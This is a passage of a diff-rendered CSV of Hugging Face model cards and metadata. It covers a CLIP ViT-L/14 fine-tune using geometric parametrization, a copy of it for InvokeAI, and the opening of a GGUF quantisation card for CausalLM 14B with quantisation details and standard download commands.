|---- visual.transformer.resblocks.0.mlp.c_proj.weight
|
| 82 |
+
|---- visual.transformer.resblocks.0.mlp.c_proj.bias
|
| 83 |
+
|
| 84 |
+
|
| 85 |
+
GmP CLIP MLP:
|
| 86 |
+
|
| 87 |
+
Weight decomposition into:
|
| 88 |
+
- radial component 'r' as norm of pre-trained weights
|
| 89 |
+
- angular component 'theta' as normalized direction
|
| 90 |
+
-> preserves weight vectors' directionality and magnitude
|
| 91 |
+
|
| 92 |
+
(mlp): Sequential(
|
| 93 |
+
|-(c_fc): GeometricLinear()
|
| 94 |
+
| (gelu): QuickGELU()
|
| 95 |
+
|-}-(c_proj): GeometricLinear()
|
| 96 |
+
| |
|
| 97 |
+
| |-- visual.transformer.resblocks.0.mlp.c_fc.r
|
| 98 |
+
| |-- visual.transformer.resblocks.0.mlp.c_fc.theta
|
| 99 |
+
| |-- visual.transformer.resblocks.0.mlp.c_fc.bias
|
| 100 |
+
|
|
| 101 |
+
|---- visual.transformer.resblocks.0.mlp.c_proj.r
|
| 102 |
+
|---- visual.transformer.resblocks.0.mlp.c_proj.theta
|
| 103 |
+
|---- visual.transformer.resblocks.0.mlp.c_proj.bias
|
| 104 |
+
|
| 105 |
+
(Same thing for [text] transformer.resblocks)
|
| 106 |
+
|
| 107 |
+
```
|
| 108 |
+
|
| 109 |
+

|
| 110 |
+
|
| 111 |
+
✅ The model / state_dict I am sharing was converted back to .weight after fine-tuning - alas, it can be used in the same manner as any state_dict, e.g. for use with ComfyUI as the SDXL / SD3 Text Encoder! 🤗
|
| 112 |
+
|
| 113 |
+
- ** For details on training and those numbers / the eval, please see [https://github.com/zer0int/CLIP-fine-tune](https://github.com/zer0int/CLIP-fine-tune)
|
| 114 |
+
- -> You can use ""exp-acts-ft-finetune-OpenAI-CLIP-ViT-L-14-GmP-manipulate-neurons.py"" to replicate my exact model fine-tune.
|
| 115 |
+
|
| 116 |
+
Pre-trained CLIP model by OpenAI, License: [MIT License](https://github.com/openai/CLIP/blob/main/LICENSE)","{""id"": ""zer0int/CLIP-GmP-ViT-L-14"", ""author"": ""zer0int"", ""sha"": ""3cf34636aee1879dc26f0df1548bbad9cd8a5e24"", ""last_modified"": ""2024-09-23 18:00:45+00:00"", ""created_at"": ""2024-06-15 12:47:19+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 5879, ""downloads_all_time"": null, ""likes"": 430, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""clip"", ""zero-shot-image-classification"", ""dataset:SPRIGHT-T2I/spright_coco"", ""base_model:openai/clip-vit-large-patch14"", ""base_model:finetune:openai/clip-vit-large-patch14"", ""license:mit"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""zero-shot-image-classification"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: openai/clip-vit-large-patch14\ndatasets:\n- SPRIGHT-T2I/spright_coco\nlicense: mit"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""CLIPModel""], ""model_type"": ""clip"", ""tokenizer_config"": {""unk_token"": {""content"": ""<|endoftext|>"", ""single_word"": false, ""lstrip"": false, ""rstrip"": false, ""normalized"": true, ""__type"": ""AddedToken""}, ""bos_token"": {""content"": ""<|startoftext|>"", ""single_word"": false, ""lstrip"": false, ""rstrip"": false, ""normalized"": true, ""__type"": ""AddedToken""}, ""eos_token"": {""content"": ""<|endoftext|>"", ""single_word"": false, ""lstrip"": false, ""rstrip"": false, ""normalized"": true, ""__type"": ""AddedToken""}, ""pad_token"": ""<|endoftext|>""}}, ""transformers_info"": {""auto_model"": ""AutoModelForZeroShotImageClassification"", ""custom_class"": null, ""pipeline_tag"": ""zero-shot-image-classification"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-BEST-smooth-GmP-HF-format.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-BEST-smooth-GmP-TE-only-HF-format.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-BEST-smooth-GmP-ft-pickle-OpenAI.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-BEST-smooth-GmP-ft-state_dict.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-BEST-smooth-GmP-ft.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-GmP-ft-TE-only-HF-format.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-GmP-ft-pickle-OpenAI.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-GmP-ft-state_dict.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-GmP-ft.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-TEXT-detail-improved-hiT-GmP-HF.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-TEXT-detail-improved-hiT-GmP-TE-only-HF.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-TEXT-detail-improved-hiT-GmP-pickle-OpenAI.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-TEXT-detail-improved-hiT-GmP-state_dict.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""AlekseyCalvin/soonfactory"", ""nftnik/Redux"", ""mschetel/zer0int-CLIP-GmP-ViT-L-14"", ""John6666/test_clip"", ""K00B404/InstantStyle_custom""], ""safetensors"": {""parameters"": {""F32"": 427616512}, ""total"": 427616512}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-09-23 18:00:45+00:00"", ""cardData"": ""base_model: openai/clip-vit-large-patch14\ndatasets:\n- SPRIGHT-T2I/spright_coco\nlicense: mit"", ""transformersInfo"": {""auto_model"": ""AutoModelForZeroShotImageClassification"", ""custom_class"": null, ""pipeline_tag"": ""zero-shot-image-classification"", ""processor"": ""AutoProcessor""}, ""_id"": ""666d8d57619769a3c4433d16"", ""modelId"": ""zer0int/CLIP-GmP-ViT-L-14"", ""usedStorage"": 15422984386}",0,https://huggingface.co/skunkworx/CLIP-GmP-ViT-L-14,1,,0,,0,,0,"AlekseyCalvin/soonfactory, John6666/test_clip, K00B404/InstantStyle_custom, huggingface/InferenceSupport/discussions/new?title=zer0int/CLIP-GmP-ViT-L-14&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bzer0int%2FCLIP-GmP-ViT-L-14%5D(%2Fzer0int%2FCLIP-GmP-ViT-L-14)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, mschetel/zer0int-CLIP-GmP-ViT-L-14, nftnik/Redux",6
|
| 117 |
+
skunkworx/CLIP-GmP-ViT-L-14,"---
|
| 118 |
+
license: mit
|
| 119 |
+
base_model:
|
| 120 |
+
- zer0int/CLIP-GmP-ViT-L-14
|
| 121 |
+
---
|
| 122 |
+
### CLIP ViT-L/14 finetune
|
| 123 |
+
|
| 124 |
+
This repo contains a copy of zer0int/CLIP-Gmp-ViT-L-14 text encoder. The models in this repo are intended for use in [InvokeAI](https://github.com/invoke-ai/InvokeAI).
|
| 125 |
+
|
| 126 |
+
Contents:
|
| 127 |
+
Copied from [zer0int/CLIP-GmP-ViT-L-14](https://huggingface.co/zer0int/CLIP-GmP-ViT-L-14).","{""id"": ""skunkworx/CLIP-GmP-ViT-L-14"", ""author"": ""skunkworx"", ""sha"": ""0c1f8d86e91d8f821ede0848d5dd99c0a3a2735a"", ""last_modified"": ""2024-12-29 17:24:48+00:00"", ""created_at"": ""2024-12-29 17:10:20+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""base_model:zer0int/CLIP-GmP-ViT-L-14"", ""base_model:finetune:zer0int/CLIP-GmP-ViT-L-14"", ""license:mit"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- zer0int/CLIP-GmP-ViT-L-14\nlicense: mit"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-12-29 17:24:48+00:00"", ""cardData"": ""base_model:\n- zer0int/CLIP-GmP-ViT-L-14\nlicense: mit"", ""transformersInfo"": null, ""_id"": ""6771827c711767cce7841180"", ""modelId"": ""skunkworx/CLIP-GmP-ViT-L-14"", ""usedStorage"": 1710537716}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=skunkworx/CLIP-GmP-ViT-L-14&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bskunkworx%2FCLIP-GmP-ViT-L-14%5D(%2Fskunkworx%2FCLIP-GmP-ViT-L-14)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
CausalLM-14B-GGUF_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv
ADDED
|
@@ -0,0 +1,459 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
TheBloke/CausalLM-14B-GGUF,"---
|
| 3 |
+
base_model: CausalLM/14B
|
| 4 |
+
datasets:
|
| 5 |
+
- JosephusCheung/GuanacoDataset
|
| 6 |
+
- Open-Orca/OpenOrca
|
| 7 |
+
- stingning/ultrachat
|
| 8 |
+
- meta-math/MetaMathQA
|
| 9 |
+
- liuhaotian/LLaVA-Instruct-150K
|
| 10 |
+
- jondurbin/airoboros-3.1
|
| 11 |
+
- WizardLM/WizardLM_evol_instruct_V2_196k
|
| 12 |
+
- RyokoAI/ShareGPT52K
|
| 13 |
+
- RyokoAI/Fandom23K
|
| 14 |
+
- milashkaarshif/MoeGirlPedia_wikitext_raw_archive
|
| 15 |
+
- wikipedia
|
| 16 |
+
- wiki_lingua
|
| 17 |
+
- fnlp/moss-003-sft-data
|
| 18 |
+
- garage-bAInd/Open-Platypus
|
| 19 |
+
- LDJnr/Puffin
|
| 20 |
+
- openbmb/llava_zh
|
| 21 |
+
- BAAI/COIG
|
| 22 |
+
- TigerResearch/tigerbot-zhihu-zh-10k
|
| 23 |
+
- liwu/MNBVC
|
| 24 |
+
- teknium/openhermes
|
| 25 |
+
inference: false
|
| 26 |
+
language:
|
| 27 |
+
- en
|
| 28 |
+
- zh
|
| 29 |
+
license: wtfpl
|
| 30 |
+
model_creator: CausalLM
|
| 31 |
+
model_name: CausalLM 14B
|
| 32 |
+
model_type: llama
|
| 33 |
+
pipeline_tag: text-generation
|
| 34 |
+
prompt_template: '<|im_start|>system
|
| 35 |
+
|
| 36 |
+
{system_message}<|im_end|>
|
| 37 |
+
|
| 38 |
+
<|im_start|>user
|
| 39 |
+
|
| 40 |
+
{prompt}<|im_end|>
|
| 41 |
+
|
| 42 |
+
<|im_start|>assistant
|
| 43 |
+
|
| 44 |
+
'
|
| 45 |
+
quantized_by: TheBloke
|
| 46 |
+
tags:
|
| 47 |
+
- llama
|
| 48 |
+
- llama2
|
| 49 |
+
- qwen
|
| 50 |
+
---
|
| 51 |
+
<!-- markdownlint-disable MD041 -->
|
| 52 |
+
|
| 53 |
+
<!-- header start -->
|
| 54 |
+
<!-- 200823 -->
|
| 55 |
+
<div style=""width: auto; margin-left: auto; margin-right: auto"">
|
| 56 |
+
<img src=""https://i.imgur.com/EBdldam.jpg"" alt=""TheBlokeAI"" style=""width: 100%; min-width: 400px; display: block; margin: auto;"">
|
| 57 |
+
</div>
|
| 58 |
+
<div style=""display: flex; justify-content: space-between; width: 100%;"">
|
| 59 |
+
<div style=""display: flex; flex-direction: column; align-items: flex-start;"">
|
| 60 |
+
<p style=""margin-top: 0.5em; margin-bottom: 0em;""><a href=""https://discord.gg/theblokeai"">Chat & support: TheBloke's Discord server</a></p>
|
| 61 |
+
</div>
|
| 62 |
+
<div style=""display: flex; flex-direction: column; align-items: flex-end;"">
|
| 63 |
+
<p style=""margin-top: 0.5em; margin-bottom: 0em;""><a href=""https://www.patreon.com/TheBlokeAI"">Want to contribute? TheBloke's Patreon page</a></p>
|
| 64 |
+
</div>
|
| 65 |
+
</div>
|
| 66 |
+
<div style=""text-align:center; margin-top: 0em; margin-bottom: 0em""><p style=""margin-top: 0.25em; margin-bottom: 0em;"">TheBloke's LLM work is generously supported by a grant from <a href=""https://a16z.com"">andreessen horowitz (a16z)</a></p></div>
|
| 67 |
+
<hr style=""margin-top: 1.0em; margin-bottom: 1.0em;"">
|
| 68 |
+
<!-- header end -->
|
| 69 |
+
|
| 70 |
+
# CausalLM 14B - GGUF
|
| 71 |
+
- Model creator: [CausalLM](https://huggingface.co/CausalLM)
|
| 72 |
+
- Original model: [CausalLM 14B](https://huggingface.co/CausalLM/14B)
|
| 73 |
+
|
| 74 |
+
<!-- description start -->
|
| 75 |
+
## Description
|
| 76 |
+
|
| 77 |
+
This repo contains GGUF format model files for [CausalLM's CausalLM 14B](https://huggingface.co/CausalLM/14B).
|
| 78 |
+
|
| 79 |
+
**NOTE**: The GGUFs originally uploaded here did not work due to a vocab issue. This was fixed on 23rd October, 15:00 UTC. The files uploaded now are confirmed to work.
|
| 80 |
+
|
| 81 |
+
Please re-download the GGUFs if you had downloaded the originally uploaded GGUF file(s).
|
| 82 |
+
|
| 83 |
+
<!-- description end -->
|
| 84 |
+
<!-- README_GGUF.md-about-gguf start -->
|
| 85 |
+
### About GGUF
|
| 86 |
+
|
| 87 |
+
GGUF is a new format introduced by the llama.cpp team on August 21st 2023. It is a replacement for GGML, which is no longer supported by llama.cpp.
|
| 88 |
+
|
| 89 |
+
Here is an incomplate list of clients and libraries that are known to support GGUF:
|
| 90 |
+
|
| 91 |
+
* [llama.cpp](https://github.com/ggerganov/llama.cpp). The source project for GGUF. Offers a CLI and a server option.
|
| 92 |
+
* [text-generation-webui](https://github.com/oobabooga/text-generation-webui), the most widely used web UI, with many features and powerful extensions. Supports GPU acceleration.
|
| 93 |
+
* [KoboldCpp](https://github.com/LostRuins/koboldcpp), a fully featured web UI, with GPU accel across all platforms and GPU architectures. Especially good for story telling.
|
| 94 |
+
* [LM Studio](https://lmstudio.ai/), an easy-to-use and powerful local GUI for Windows and macOS (Silicon), with GPU acceleration.
|
| 95 |
+
* [LoLLMS Web UI](https://github.com/ParisNeo/lollms-webui), a great web UI with many interesting and unique features, including a full model library for easy model selection.
|
| 96 |
+
* [Faraday.dev](https://faraday.dev/), an attractive and easy to use character-based chat GUI for Windows and macOS (both Silicon and Intel), with GPU acceleration.
|
| 97 |
+
* [ctransformers](https://github.com/marella/ctransformers), a Python library with GPU accel, LangChain support, and OpenAI-compatible AI server.
|
| 98 |
+
* [llama-cpp-python](https://github.com/abetlen/llama-cpp-python), a Python library with GPU accel, LangChain support, and OpenAI-compatible API server.
|
| 99 |
+
* [candle](https://github.com/huggingface/candle), a Rust ML framework with a focus on performance, including GPU support, and ease of use.
|
| 100 |
+
|
| 101 |
+
<!-- README_GGUF.md-about-gguf end -->
|
| 102 |
+
<!-- repositories-available start -->
|
| 103 |
+
## Repositories available
|
| 104 |
+
|
| 105 |
+
* [AWQ model(s) for GPU inference.](https://huggingface.co/TheBloke/CausalLM-14B-AWQ)
|
| 106 |
+
* [GPTQ models for GPU inference, with multiple quantisation parameter options.](https://huggingface.co/TheBloke/CausalLM-14B-GPTQ)
|
| 107 |
+
* [2, 3, 4, 5, 6 and 8-bit GGUF models for CPU+GPU inference](https://huggingface.co/TheBloke/CausalLM-14B-GGUF)
|
| 108 |
+
* [CausalLM's original unquantised fp16 model in pytorch format, for GPU inference and for further conversions](https://huggingface.co/CausalLM/14B)
|
| 109 |
+
<!-- repositories-available end -->
|
| 110 |
+
|
| 111 |
+
<!-- prompt-template start -->
|
| 112 |
+
## Prompt template: ChatML
|
| 113 |
+
|
| 114 |
+
```
|
| 115 |
+
<|im_start|>system
|
| 116 |
+
{system_message}<|im_end|>
|
| 117 |
+
<|im_start|>user
|
| 118 |
+
{prompt}<|im_end|>
|
| 119 |
+
<|im_start|>assistant
|
| 120 |
+
|
| 121 |
+
```
|
| 122 |
+
|
| 123 |
+
<!-- prompt-template end -->
|
| 124 |
+
<!-- licensing start -->
|
| 125 |
+
## Licensing
|
| 126 |
+
|
| 127 |
+
The creator of the source model has listed its license as `wtfpl`, and this quantization has therefore used that same license.
|
| 128 |
+
|
| 129 |
+
As this model is based on Llama 2, it is also subject to the Meta Llama 2 license terms, and the license files for that are additionally included. It should therefore be considered as being claimed to be licensed under both licenses. I contacted Hugging Face for clarification on dual licensing but they do not yet have an official position. Should this change, or should Meta provide any feedback on this situation, I will update this section accordingly.
|
| 130 |
+
|
| 131 |
+
In the meantime, any questions regarding licensing, and in particular how these two licenses might interact, should be directed to the original model repository: [CausalLM's CausalLM 14B](https://huggingface.co/CausalLM/14B).
|
| 132 |
+
<!-- licensing end -->
|
| 133 |
+
<!-- compatibility_gguf start -->
|
| 134 |
+
## Compatibility
|
| 135 |
+
|
| 136 |
+
These quantised GGUFv2 files are compatible with llama.cpp from August 27th onwards, as of commit [d0cee0d](https://github.com/ggerganov/llama.cpp/commit/d0cee0d36d5be95a0d9088b674dbb27354107221)
|
| 137 |
+
|
| 138 |
+
They are also compatible with many third party UIs and libraries - please see the list at the top of this README.
|
| 139 |
+
|
| 140 |
+
## Explanation of quantisation methods
|
| 141 |
+
|
| 142 |
+
<details>
|
| 143 |
+
<summary>Click to see details</summary>
|
| 144 |
+
|
| 145 |
+
The new methods available are:
|
| 146 |
+
|
| 147 |
+
* GGML_TYPE_Q2_K - ""type-1"" 2-bit quantization in super-blocks containing 16 blocks, each block having 16 weight. Block scales and mins are quantized with 4 bits. This ends up effectively using 2.5625 bits per weight (bpw)
|
| 148 |
+
* GGML_TYPE_Q3_K - ""type-0"" 3-bit quantization in super-blocks containing 16 blocks, each block having 16 weights. Scales are quantized with 6 bits. This end up using 3.4375 bpw.
|
| 149 |
+
* GGML_TYPE_Q4_K - ""type-1"" 4-bit quantization in super-blocks containing 8 blocks, each block having 32 weights. Scales and mins are quantized with 6 bits. This ends up using 4.5 bpw.
|
| 150 |
+
* GGML_TYPE_Q5_K - ""type-1"" 5-bit quantization. Same super-block structure as GGML_TYPE_Q4_K resulting in 5.5 bpw
|
| 151 |
+
* GGML_TYPE_Q6_K - ""type-0"" 6-bit quantization. Super-blocks with 16 blocks, each block having 16 weights. Scales are quantized with 8 bits. This ends up using 6.5625 bpw
|
| 152 |
+
|
| 153 |
+
Refer to the Provided Files table below to see what files use which methods, and how.
|
| 154 |
+
</details>
|
| 155 |
+
<!-- compatibility_gguf end -->
|
| 156 |
+
|
| 157 |
+
<!-- README_GGUF.md-provided-files start -->
|
| 158 |
+
## Provided files
|
| 159 |
+
|
| 160 |
+
| Name | Quant method | Bits | Size | Max RAM required | Use case |
|
| 161 |
+
| ---- | ---- | ---- | ---- | ---- | ----- |
|
| 162 |
+
| [causallm_14b.Q4_0.gguf](https://huggingface.co/TheBloke/CausalLM-14B-GGUF/blob/main/causallm_14b.Q4_0.gguf) | Q4_0 | 4 | 8.18 GB| 10.68 GB | legacy; small, very high quality loss - prefer using Q3_K_M |
|
| 163 |
+
| [causallm_14b.Q4_1.gguf](https://huggingface.co/TheBloke/CausalLM-14B-GGUF/blob/main/causallm_14b.Q4_1.gguf) | Q4_1 | 4 | 9.01 GB| 11.51 GB | legacy; small, substantial quality loss - lprefer using Q3_K_L |
|
| 164 |
+
| [causallm_14b.Q5_0.gguf](https://huggingface.co/TheBloke/CausalLM-14B-GGUF/blob/main/causallm_14b.Q5_0.gguf) | Q5_0 | 5 | 9.85 GB| 12.35 GB | legacy; medium, balanced quality - prefer using Q4_K_M |
|
| 165 |
+
| [causallm_14b.Q5_1.gguf](https://huggingface.co/TheBloke/CausalLM-14B-GGUF/blob/main/causallm_14b.Q5_1.gguf) | Q5_1 | 5 | 10.69 GB| 13.19 GB | legacy; medium, low quality loss - prefer using Q5_K_M |
|
| 166 |
+
| [causallm_14b.Q8_0.gguf](https://huggingface.co/TheBloke/CausalLM-14B-GGUF/blob/main/causallm_14b.Q8_0.gguf) | Q8_0 | 8 | 15.06 GB| 17.56 GB | very large, extremely low quality loss - not recommended |
|
| 167 |
+
|
| 168 |
+
**Note**: the above RAM figures assume no GPU offloading. If layers are offloaded to the GPU, this will reduce RAM usage and use VRAM instead.
|
| 169 |
+
|
| 170 |
+
|
| 171 |
+
|
| 172 |
+
<!-- README_GGUF.md-provided-files end -->
|
| 173 |
+
|
| 174 |
+
<!-- README_GGUF.md-how-to-download start -->
|
| 175 |
+
## How to download GGUF files
|
| 176 |
+
|
| 177 |
+
**Note for manual downloaders:** You almost never want to clone the entire repo! Multiple different quantisation formats are provided, and most users only want to pick and download a single file.
|
| 178 |
+
|
| 179 |
+
The following clients/libraries will automatically download models for you, providing a list of available models to choose from:
|
| 180 |
+
|
| 181 |
+
* LM Studio
|
| 182 |
+
* LoLLMS Web UI
|
| 183 |
+
* Faraday.dev
|
| 184 |
+
|
| 185 |
+
### In `text-generation-webui`
|
| 186 |
+
|
| 187 |
+
Under Download Model, you can enter the model repo: TheBloke/CausalLM-14B-GGUF and below it, a specific filename to download, such as: causallm_14b.Q4_K_M.gguf.
|
| 188 |
+
|
| 189 |
+
Then click Download.
|
| 190 |
+
|
| 191 |
+
### On the command line, including multiple files at once
|
| 192 |
+
|
| 193 |
+
I recommend using the `huggingface-hub` Python library:
|
| 194 |
+
|
| 195 |
+
```shell
|
| 196 |
+
pip3 install huggingface-hub
|
| 197 |
+
```
|
| 198 |
+
|
| 199 |
+
Then you can download any individual model file to the current directory, at high speed, with a command like this:
|
| 200 |
+
|
| 201 |
+
```shell
|
| 202 |
+
huggingface-cli download TheBloke/CausalLM-14B-GGUF causallm_14b.Q4_K_M.gguf --local-dir . --local-dir-use-symlinks False
|
| 203 |
+
```
|
| 204 |
+
|
| 205 |
+
<details>
|
| 206 |
